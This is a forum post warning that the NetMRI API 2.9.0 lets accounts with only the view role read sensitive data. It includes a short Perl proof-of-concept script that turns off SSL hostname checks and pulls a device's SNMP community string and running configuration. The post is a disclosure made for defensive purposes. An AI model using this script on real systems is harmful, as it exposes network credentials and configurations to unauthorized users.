Learn How We Can Help You Keep Teleworkers Protected During the COVID-19 Crisis

Network Change & Configuration Management

Reply
Highlighted

Beware the NetMRI API 2.9.0 has a Security Gap in it

Expert
Posts: 127
939     0

Hello,

You might be cautious in having users with default - view role access to NetMRI and expect that they cannot read sensitive information when they can via a simple perl script.  There appears to be no authentication auditing either.  I haven't tested updating netmri via a Perl script, but I'd assume that this would work as well.  There is a case opened with Infoblox on the issue and is being reviewed. I've included the perl script below.  You will need to edit in your specific authentication information if you want to test.  Perl must be installed as well on your system (my applogies to the perl experts, this was very Q&D).

# This script displays addresses for the device
# passed in from the command line.

use strict;
use warnings;
use NetMRI::API;
use NetMRI::API::Remote;
use NetMRI::API::Broker;

$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;


print "Started\n";

# get the device id from the command
# line as the first argument.
my $device_id = shift @ARGV;

# Connect to the NetMRI.
# EDIT THE ACCOUNT INFORMATION BELOW
# FOR YOUR ENVIRONMENT
my $client = new NetMRI::API({ api_version => '2.9.0',
username => 'testuser',
password => 'testpassword',
url => 'https://a.b.c.d',
 });
print "Authenticated\n";

# retrieve the device
# see NetMRI::API::Broker:Smiley Very Happyevice for other methods
# available on $client->broker->device
my $device = $client->broker->device->show({ DeviceID => $device_id })->{device};

print "Name: ", $device->DeviceName, "\n";
print "Type:", $device->DeviceType, "\n";
print "Assurance: ", $device->DeviceAssurance, "\n";
print "Vendor: ", $device->DeviceVendor, "\n";
print "Model: ", $device->DeviceModel, "\n";
print "IOS Version: ", $device->DeviceVersion, "\n";
print "Mgmt IP: ", $device->DeviceIPDotted, "\n";
print "MAC: ", $device->DeviceMAC, "\n";

my $snmpid = $client->broker->device->DeviceCommunity({ DeviceID => $device_id });
print "SNMP Community: ", $snmpid->{DeviceCommunity}, "\n";

my $runconfig = $client->broker->device->running_config_text({ DeviceID => $device_id });
print "\n\n\n##### RUNNING CONFIG #####\n\n", $runconfig->{running_config_text},"\n";

 

Showing results for 
Search instead for 
Do you mean 

Recommended for You